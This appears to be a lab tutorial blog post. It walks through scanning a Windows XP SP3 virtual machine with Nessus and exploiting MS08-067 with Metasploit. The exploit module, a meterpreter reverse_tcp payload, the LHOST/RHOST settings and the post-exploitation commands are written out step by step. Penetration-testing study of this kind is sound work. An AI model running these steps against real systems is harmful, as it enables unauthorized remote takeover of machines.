Now I'll try to use metasploit console to exploitation windows XP sp 3 on Virtualbox, f irst we need to know information about victim, in penetration testing know as Informaton Gathering, we can use nmap, Zenmap or ect to scanning candidate victim on network.
Scanning Network
We can know any user active on network with IP 192.168.56.102 and after get IP we need to scanning vulnerability target, now I use Nessus
After open Nessus fill Name Target, Policy, and fill Scan Target with IP's victim
Press scan and wait till finish result
We can see vulnerability of victim is have 2 high risk vulnerability, press on port 445 and look deeply information like this
I look 2 vulnerability and choose a 2nd plugin I have, I was try to exploit first option and fail exploitation it, and I choose 2nd option this is
Plugin name is MS08-067, I try to find information about that plugin vulnerability on google and find at metaploit payload description, and try to explit it, and next open metaploit console with command on terminal #msfconsole
Use exploit match with nessus result and syntax in metasploit is
use exploit/windows/smb/ms08_067_netapi
After choose exploit we need to set payload with syntax
set PAYLOAD windows/meterpreter/reverse_tcp
After set Payload we need to determine Local Host and target use syntax
set LHOST 192.168.56.1 < < My IP
set RHOST 192.168.56.102 < < Target IP
and execute Exploit with syntax
exploit
To enter meterpreter mode
After we on meterpreter mode its mean we has make hole to taget system with payload we used, now we need to enter C:\ on system32 to full takedown target system
use syntax
meterpreter > execute -M -f cmd.exe
This command mean we make system execute command prompth on system (XP) and afte that we enter to system32 target
For prove we have taken over our system proved to create a folder in C:\
Use command mkdir is2c in C:\> to make folder on C:\
And success to make folder in C:\ that mean we has take over XP system.
No comments:
Post a Comment